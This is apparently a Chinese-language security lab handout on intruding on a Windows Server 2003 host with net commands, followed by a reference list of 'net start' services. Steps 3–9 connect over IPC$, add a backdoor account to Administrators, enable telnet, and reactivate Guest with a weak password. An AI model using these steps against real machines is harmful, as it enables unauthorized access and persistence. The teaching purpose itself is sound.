NET命令入侵实例

实验目的

了解NET入侵的过程

掌握NET命令的使用方法和它的参数搭配

实验内容

NET命令的使用方法和它的参数搭配

实验环境描述

XP作为客户端，Windows server 2003作为远程服务器。

实验步骤

在Windows xp和win 2003系统，两人进行实验，相互得知对方的IP及用户名、密码。在此server 2003系统IP为192.168.1.2。此IP地址不固定。

2.点击windows xp的“打开控制台”登录到实验场景中的目标主机。 点击windows 2003的“打开控制台”，账号administrator,密码p@ssw0rd，登录到实验场景中的目标主机。点击windows xp的“打开控制台”账号safe,密码p@ssw0rd，直接进入windowsxp如图所示：

3.登陆windows xp主机：“net use ＼＼192.168.1.2＼ipc$ p@ssw0rd 　/user:administrator”如下图：

4.创建一个用户，由于SA的权限相当于系统的超级用户，如：加一个sysusers的用户密码为111111 。输入命令：“net 　user sysusers 111111 /add”

5.显示命令成功后，就可以把他加入Administrators组了，输入命令：“net localgroup Administrators sysusers /add”，如下图：

6.打开对方的TELNET服务命令为：“net start telnet”如下图：

注：“net start telnet”命令正常情况下可以开启对方的“telnet”服务，但是因为对方该服务禁用了，所以需要先把禁用给去掉，然后再启动。

7.将telnet服务设置为“自动”，命令为“sc config tlntsvr start= auto”，需要注意的是，telnet服务在这里一定要用“tlntsvr”，用“sc config telnet start= auto”是无法启动的，另外“=”号后边和“auto”之前要有一个空格，如下图：

8.启动“telnet”服务，命令为“net start telnet”或者用“net start tlntsvr”进行启动，如下图： 激活Guest用户（guest是windows的默认用户），输入命令：“net user guest /active：yes”

9.把一个用户的密码改掉，把 guest的密码改为111111，其他用户也可以的。只要有权限就可以。执行“net user guest 111111”命令，如下图

10.退出远程连接命令：“net use * /ｄｅｌｅｔｅ”，如下图

11.用net命令的帮助时，所有 net 命令接受选项 / yes 和 /no（可缩写为 / y 和 /n ）。/y 对命令产生的任何交互提示自动回答“是”，/n 回答“否”。例如，net stop server 通常提示确认是否根据服务器服务结束所有服务，net stop server /y 自动回答“是”并关闭服务器服务。如下图：

1. 提供网络命令列表及帮助主题，或提供指定命令或主题的帮助。如想得到net命令的用法可以用“net /?”查询，如果想知道net命令中“use”的用法，可以直接输入“net use ?”或者“net use help”来进行进一步查询，或者用“net help use”来获得更详细的内容。

附：常用的net命令 Net start 启动服务，或显示已启动服务的列表

net start [service] 启动相关的服务

相关服务包括 alerter、client service ｆｏｒ netware、clipbook server、content index、comput er browser、dhcp client、directory replicator、eventlog、ftp publishing service、 hypermedia object manager、logical disk manager、lpdsvc、media services managemen t, messenger、Fax Service、Microsoft install server、net logon、network dde、netw ork dde dsdm、nt lm security support provider、ole、plug ａｎｄ play、remote access connection manager、remote access isnsap service、remote access server、remote pr ocedure call (rpc) locator、remote procedure call (rpc) service、schedule、server 、simple tcp/ip services、site server ldap service、smartcard resource manager、s nmp、spooler、task scheduler、tcp/ip netbios helper、telephony service、tracking service、tracking (server) service、ups、Windows time service 和 workstation。

下面服务只有在 Windows 2000 上可用：file service ｆｏｒ macintosh、gateway service ｆｏｒ netware、microsoft dhcp service、print service ｆｏｒ macintosh、windows interne t name service。

Net start Alerter 启动“警报器”服务。“警报器”服务发送警告消息。

Net start ClipBook Server 启动“剪贴簿服务器”服务。

net start ＂computer browser＂ 启动“计算机浏览器”服务。 Net start DHCP Client 启动“DHCP 客户”服务。该命令只有在安装了 TCP/IP 协议之后才可用。

Net start Eventlog 启动“事件日志”服务，该服务将事件记录在本地计算机上。必须在使用事件查看器查看记 录的事件之前启动该服务。 net start messenger 启动“信使”服务。“信使”服务允许计算机接收邮件。 net start ＂net logon＂ 启动“网络登录”服务。“网络登录”服务验证登录请求并控制复制用户帐户数据库域宽。 两个词组成的服务名，例如 Net Logon，必须两边加引号 (＂)。该服务也可以使用命令 net start netlogon 启动。 net start ＂network dde＂ 　　 启动“网络 DDE”服务。

net start ＂nt lm security support provider＂ 启动“NT LM 安全支持提供程序”服务。该命令只有在安装了“NT LM 安全支持提供程序” 后才可用。

net start ole 启动对象链接和嵌入服务。

net start ＂remote access connection manager＂ 启动“远程访问连接管理器”服务。该命令只有在安装了“远程访问服务”后才可用。

net start ＂remote procedure call (rpc) locator＂ 启动 RPC 定位器服务。“定位器”服务是 Microsoft Windows 2000 的 RPC 名称服务。

net start schedule 启动“计划”服务。“计划”服务使计算机可以使用 at 命令在指定时间启动程序。

net start server 启动“服务器”服务。“服务器”服务使计算机可以共享网络上的资源。

net start spooler 启动“后台打印程序”。

net start ups 启动“不间断电源 (UPS)”服务

net start workstation 启动“工作站”服务。“工作站”服务使计算机可以连接并使用网络资源。

Net start Schedule 有的地方称为“定时”服务，叫法不同，请大家注意了，其实是一回事！

Net start Telnet 启动telnet服务，打开23端口，有的情况下需先运行NTLM.exe。为什么？到榕G的说明里去找 吧！

net start workstation 打开NET USE

net start lanmanserver 打开 IPC 服务

实验到此结束；